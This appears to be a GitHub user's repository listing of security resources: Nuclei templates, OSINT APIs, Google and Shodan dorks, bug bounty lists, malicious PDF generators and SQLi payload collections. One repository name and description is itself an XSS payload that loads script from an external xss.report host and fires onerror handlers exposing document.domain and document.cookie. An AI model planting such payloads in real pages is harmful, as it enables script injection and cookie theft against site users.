HUNTER's repositories
40k-nuclei-templates
40,000+ Nuclei templates for security scanning and detection across diverse web applications and services
API-s-for-OSINT
List of API's for gathering information about phone numbers, addresses, domains etc
Awesome-Cybersecurity-Handbooks
A huge chunk of my personal notes since I started playing CTFs and working as a Red Teamer.
awesome-shodan-queries
🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩💻
Bug-Bounty-Dork
Bug Bounty Dorks For World Wide Websites
bug-bounty-platforms
A community-powered collection of all known bug bounty platforms, vulnerability disclosure platforms, and crowdsourced security platforms currently active on the Internet.
Leaked-Credentials
how to look for Leaked Credentials !
malicious-pdf
💀 Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
-script-src-https-xss.report-c-lover-script-
'/;//"><script src=https://xss.report/c/lover></script> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.domain)"> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.cookie)">
800-Bug-Bounty-Programs
Asset inventory of over 800 public bug bounty programs.
Affinity
Free 2D symbols for computer network diagrams
awesome-android-security
A curated list of Android Security materials and resources For Pentesters and Bug Hunters
Awesome-Dorks
Dorks for Bug Bounty Hunting
bug-bounty-dorkss
List of Google Dorks for sites that have responsible disclosure program & bug bounty program
Conferences
Conference slides
fuzzuli
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
gitGraber
gitGraber: monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...
google-dorks-bug-bounty
A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting
Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them
OFFAT
The OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving towards completion.
One-Liners
A collection of awesome one-liners for bug bounty hunting.
PDF-Exploits
this repo contains all types of pdf exploits..
scrapts
Scrapts Scrapts Scrapts
Shodan_Dorks
Shodan Dorks
SQLI-PAYLOAD
Header Based SQLi's Payloads
vapi
vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios through Exercises.
XXElixir
This tool is designed to test for file upload and XXE vulnerabilities by poisoning XLSX files.